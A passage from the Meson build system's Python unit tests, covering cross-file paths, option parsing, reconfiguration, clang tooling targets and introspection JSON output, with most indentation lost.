# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
            # tests this test will fail, so mock the environment, pop
            # it, then test.
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
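            # BuildDirLock takes a lock file inside meson-private, so that
            # directory has to exist before the lock can be acquired.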
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
            # this test needs to use shared libraries to test the path-resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError, it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
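        # The cross file points pkg-config at a wrapper script for host-machine
        # lookups, while PKG_CONFIG_LIBDIR serves the native (build-machine)
        # lookup; run once with the dependency declared native and once without.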
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
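        # Downgrade the recorded coredata version so that --reconfigure has to
        # regenerate the configuration from scratch, then verify the previously
        # set option values survive.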
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
        # Wipe from inside the build directory itself (cwd restored via addCleanup).
        self.addCleanup(os.chdir, os.getcwd())
        os.chdir(self.builddir)
        self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
        # changes to target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': 'undefined'
}
]
}
self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
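        # --buildoptions run directly against meson.build must match the result
        # obtained from a configured build directory.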
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
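        # Validate the key names and value types of every intro-*.json file
        # written under meson-info, plus a handful of expected entries.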
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
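            # key_type_list holds (key, expected_type) pairs; check that each
            # key is present in obj with a value of the expected type.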
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
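        # `meson introspect --all` must return exactly the same data as the
        # individual intro-*.json files on disk.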
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
